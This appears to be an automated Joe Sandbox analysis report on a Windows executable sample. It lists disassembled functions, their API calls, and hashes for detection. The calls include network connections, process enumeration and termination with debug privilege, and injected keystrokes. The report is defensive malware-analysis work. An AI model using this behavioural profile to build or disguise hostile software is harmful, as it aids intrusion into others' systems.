                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 008151D1
                                      • Part of subcall function 00816FBA: DeleteObject.GDI32(00000000), ref: 00816FE6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0081520D
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0081521A
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0081524D
                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00815287
                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00815296
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                    • String ID:
                                    • API String ID: 3210457359-0
                                    • Opcode ID: ac034c54e12bccad9d23b2e9b75f3a906eb698f9e3be89de7e3a31c8c3a9269b
                                    • Instruction ID: de326cf4cc1d82dbbd8a55e0bdfde45dd8abc44c3e1c4877106e9d0c39024979
                                    • Opcode Fuzzy Hash: ac034c54e12bccad9d23b2e9b75f3a906eb698f9e3be89de7e3a31c8c3a9269b
                                    • Instruction Fuzzy Hash: AA51A131A90A08FEEF219F28CC49BD83B69FF85325F148115F625D62E0C7B5A9D0DB41
                                    Function 00798B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 007D6890
                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007D68A9
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007D68B9
                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 007D68D1
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007D68F2
                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00798874,00000000,00000000,00000000,000000FF,00000000), ref: 007D6901
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007D691E
                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00798874,00000000,00000000,00000000,000000FF,00000000), ref: 007D692D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                    • String ID:
                                    • API String ID: 1268354404-0
                                    • Opcode ID: 92d9fb51b74d73098459245d9075a0889053a5b116f654bbaac4d2da426199ea
                                    • Instruction ID: 6f0fea78111396634e617f2a5471fe9f34204fb2d0ade133d7f0a5c3046b1c87
                                    • Opcode Fuzzy Hash: 92d9fb51b74d73098459245d9075a0889053a5b116f654bbaac4d2da426199ea
                                    • Instruction Fuzzy Hash: 1E5177B0600209EFDF20CF28DC55BAA7BB6FF58750F144519F942972A0DB78E990DB50
                                    Function 007FC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007FC182
                                    • GetLastError.KERNEL32 ref: 007FC195
                                    • SetEvent.KERNEL32(?), ref: 007FC1A9
                                      • Part of subcall function 007FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007FC272
                                      • Part of subcall function 007FC253: GetLastError.KERNEL32 ref: 007FC322
                                      • Part of subcall function 007FC253: SetEvent.KERNEL32(?), ref: 007FC336
                                      • Part of subcall function 007FC253: InternetCloseHandle.WININET(00000000), ref: 007FC341
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 337547030-0
                                    • Opcode ID: 48436afe7e800188d8c7399d2070a80c0702dcbe9b7226bfc9227fe1c2b562ac
                                    • Instruction ID: 240d4eff223b76c8993043bf8428c06a7b058c8dfba56a83292c7b764f3b9a4c
                                    • Opcode Fuzzy Hash: 48436afe7e800188d8c7399d2070a80c0702dcbe9b7226bfc9227fe1c2b562ac
                                    • Instruction Fuzzy Hash: B4318E7164060DAFDB229FA5DE44AB6BBFCFF18300B14841DFA5686711D739E814EB60
                                    Function 007E25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007E3A57
                                      • Part of subcall function 007E3A3D: GetCurrentThreadId.KERNEL32 ref: 007E3A5E
                                      • Part of subcall function 007E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007E25B3), ref: 007E3A65
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007E25BD
                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007E25DB
                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007E25DF
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007E25E9
                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007E2601
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 007E2605
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007E260F
                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007E2623
                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 007E2627
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                    • String ID:
                                    • API String ID: 2014098862-0
                                    • Opcode ID: 98937fef3241acca76538345995cb0104e6e516ee69c1fb9de2bf6a371b049c5
                                    • Instruction ID: 1d2a2e189bfcbe958e9f90a7645dafa4858fd5d32e2f2144f2a2c02c7bb7e944
                                    • Opcode Fuzzy Hash: 98937fef3241acca76538345995cb0104e6e516ee69c1fb9de2bf6a371b049c5
                                    • Instruction Fuzzy Hash: FA01B1303D0354BBFB1067699C8EF993E9DEF5EB12F104015F318AF0D1C9E624458A69
                                    Function 007E1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,007E1449,?,?,00000000), ref: 007E180C
                                    • HeapAlloc.KERNEL32(00000000,?,007E1449,?,?,00000000), ref: 007E1813
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007E1449,?,?,00000000), ref: 007E1828
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,007E1449,?,?,00000000), ref: 007E1830
                                    • DuplicateHandle.KERNEL32(00000000,?,007E1449,?,?,00000000), ref: 007E1833
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007E1449,?,?,00000000), ref: 007E1843
                                    • GetCurrentProcess.KERNEL32(007E1449,00000000,?,007E1449,?,?,00000000), ref: 007E184B
                                    • DuplicateHandle.KERNEL32(00000000,?,007E1449,?,?,00000000), ref: 007E184E
                                    • CreateThread.KERNEL32(00000000,00000000,007E1874,00000000,00000000,00000000), ref: 007E1868
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                    • String ID:
                                    • API String ID: 1957940570-0
                                    • Opcode ID: 95a70b444e04a8292a35da571994894d2bb9480fe39b7a4c2f0e2497dd0638c2
                                    • Instruction ID: b80bba52bab175acef6b9af2cef32e766330510e50d6a63318462bf7437bf5e9
                                    • Opcode Fuzzy Hash: 95a70b444e04a8292a35da571994894d2bb9480fe39b7a4c2f0e2497dd0638c2
                                    • Instruction Fuzzy Hash: FF015CB56C0344BFE610AB65DC49F977B6DFB89B11F418411FA05DB191D67598008B60
                                    Function 0080A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 007ED501
                                      • Part of subcall function 007ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 007ED50F
                                      • Part of subcall function 007ED4DC: CloseHandle.KERNEL32(00000000), ref: 007ED5DC
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0080A16D
                                    • GetLastError.KERNEL32 ref: 0080A180
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0080A1B3
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0080A268
                                    • GetLastError.KERNEL32(00000000), ref: 0080A273
                                    • CloseHandle.KERNEL32(00000000), ref: 0080A2C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: 1056a1bb73af6f8f95ca0c9b71984c59be592578219422f30f77d2412b987e34
                                    • Instruction ID: 29e6f824224c133b6c4f869294ea196fba01f2787b603594f5a506c9c16ef41a
                                    • Opcode Fuzzy Hash: 1056a1bb73af6f8f95ca0c9b71984c59be592578219422f30f77d2412b987e34
                                    • Instruction Fuzzy Hash: 2C617B31244342AFD724DF15C898F15BBA5FF54318F18849CE4668BBA2C776EC45CB92
                                    Function 00813886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00813925
                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0081393A
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00813954
                                    • _wcslen.LIBCMT ref: 00813999
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 008139C6
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008139F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcslen
                                    • String ID: SysListView32
                                    • API String ID: 2147712094-78025650
                                    • Opcode ID: 620a7884fdc6732e4c029e79bc7b7ae7564a6e119251673af5069e5030b52d4c
                                    • Instruction ID: aa18d9434001613de9625f1052ff10d9de67ab3473651d54ed95b3a9ccc17366
                                    • Opcode Fuzzy Hash: 620a7884fdc6732e4c029e79bc7b7ae7564a6e119251673af5069e5030b52d4c
                                    • Instruction Fuzzy Hash: 2E41B371A00219ABEF219F64CC49FEA7BADFF08354F10052AF958E7281D7759E94CB90
                                    Function 007EBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007EBCFD
                                    • IsMenu.USER32(00000000), ref: 007EBD1D
                                    • CreatePopupMenu.USER32 ref: 007EBD53
                                    • GetMenuItemCount.USER32(010A7200), ref: 007EBDA4
                                    • InsertMenuItemW.USER32(010A7200,?,00000001,00000030), ref: 007EBDCC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                    • String ID: 0$2
                                    • API String ID: 93392585-3793063076
                                    • Opcode ID: 6ceb99e195d7020a014f91997bb556a287b6a5bb57546d17920c3902bd49c972
                                    • Instruction ID: 006a32036d2674db9d78f29e8b285353820ad8f888a7583fa63f7c6e6673ea60
                                    • Opcode Fuzzy Hash: 6ceb99e195d7020a014f91997bb556a287b6a5bb57546d17920c3902bd49c972
                                    • Instruction Fuzzy Hash: 6F519E70A02289DBDB11CFAADC88BAEBFF9BF49314F148119E411DB290D778A941CB51
                                    Function 007A2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 007A2D4B
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 007A2D53
                                    • _ValidateLocalCookies.LIBCMT ref: 007A2DE1
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 007A2E0C
                                    • _ValidateLocalCookies.LIBCMT ref: 007A2E61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: &Hz$csm
                                    • API String ID: 1170836740-1334577351
                                    • Opcode ID: 796526aa4006d70243326e4688927cdd00d0c4a363c161548c79402c1e16c985
                                    • Instruction ID: d312ecbd4f052dfc322e0a568cf40d641e500baab8b6d61d5dfbbf0f927277df
                                    • Opcode Fuzzy Hash: 796526aa4006d70243326e4688927cdd00d0c4a363c161548c79402c1e16c985
                                    • Instruction Fuzzy Hash: E1417534A01209EBCF14DF6CC849A9EBBB5BF86324F148255E8146B353D739DA56CB90
                                    Function 007EC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 007EC913
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: 6ad15095ae479940d53f26fcb8f8cb35b27ae6f018443f462eaf60a1652368e1
                                    • Instruction ID: d230d6bf5cc7a7b596c441188e14cc7e5b7408be0b59f00ab2b0626b89ce9589
                                    • Opcode Fuzzy Hash: 6ad15095ae479940d53f26fcb8f8cb35b27ae6f018443f462eaf60a1652368e1
                                    • Instruction Fuzzy Hash: 36113D3968A34AFEE7025B159C83CAE279CDF5A314B10412AF500F62C3E7BD6D015269
                                    Function 007EED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$LocalTime
                                    • String ID:
                                    • API String ID: 952045576-0
                                    • Opcode ID: c8b9b18fa680f9b20b3d5cdf8d540b92442f67d5506483de81b8e873f1bd84d8
                                    • Instruction ID: beabf0b430735e491155de945da1d2519749bd857e57f5b23c9b0c45ee15793c
                                    • Opcode Fuzzy Hash: c8b9b18fa680f9b20b3d5cdf8d540b92442f67d5506483de81b8e873f1bd84d8
                                    • Instruction Fuzzy Hash: FC41B565C11158F5CB11EBF48C8EACFB7ACAF8A300F004962E514E3162FB38E255C3A6
                                    Function 0079F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,007D682C,00000004,00000000,00000000), ref: 0079F953
                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,007D682C,00000004,00000000,00000000), ref: 007DF3D1
                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,007D682C,00000004,00000000,00000000), ref: 007DF454
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 235573fd990b46ba83e7d8c6bdf3dda6053d6a6f7415530857bf51f5b27228d4
                                    • Instruction ID: d345d135608489989dbfadfc1e8ef28ab105ad706cea4811c8a459c5ba9cd04c
                                    • Opcode Fuzzy Hash: 235573fd990b46ba83e7d8c6bdf3dda6053d6a6f7415530857bf51f5b27228d4
                                    • Instruction Fuzzy Hash: ED41EB31614A80BECF359B2DE88876A7BA5BF56334F14853DE047D6660C67DB880C711
                                    Function 00812D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00812D1B
                                    • GetDC.USER32(00000000), ref: 00812D23
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00812D2E
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00812D3A
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00812D76
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00812D87
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00815A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00812DC2
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00812DE1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: ad84b1fa9bca8ecef35241b53c9a23f8c3ffca2d7c66b70a658f895197a3ec6f
                                    • Instruction ID: 5dc854c8dbe0111326f02e10cefde91cbc045ccb84b59f7badcb77077c57fcb3
                                    • Opcode Fuzzy Hash: ad84b1fa9bca8ecef35241b53c9a23f8c3ffca2d7c66b70a658f895197a3ec6f
                                    • Instruction Fuzzy Hash: E3317872241214BFEB218F54DC8AFEB3BADFF09711F048055FE08DA291C6759890CBA4
                                    Function 007E5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: ee58ce7cc217cff8a42da3822713cd8fbd86c1f5e6ec2dfddfe95ecf6bddd2be
                                    • Instruction ID: 32bc72f72e19ea8c29555023ed463e0ca64e12560ca51f39494ec66dd9850784
                                    • Opcode Fuzzy Hash: ee58ce7cc217cff8a42da3822713cd8fbd86c1f5e6ec2dfddfe95ecf6bddd2be
                                    • Instruction Fuzzy Hash: 7321DA6164295DB7E6149A124D92FFB335CFF6979CF440120FE04DA682F76CED1082E5
                                    Function 00804FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: NULL Pointer assignment$Not an Object type
                                    • API String ID: 0-572801152
                                    • Opcode ID: d6b0ae3c1938b0aa392649a4c1ec28da1ad91f14923157a8c7490304b8e87735
                                    • Instruction ID: 4d96cb9b4c2998f19281cf3151567ad04b63375a6d75600c007f99ff2cbf6a7c
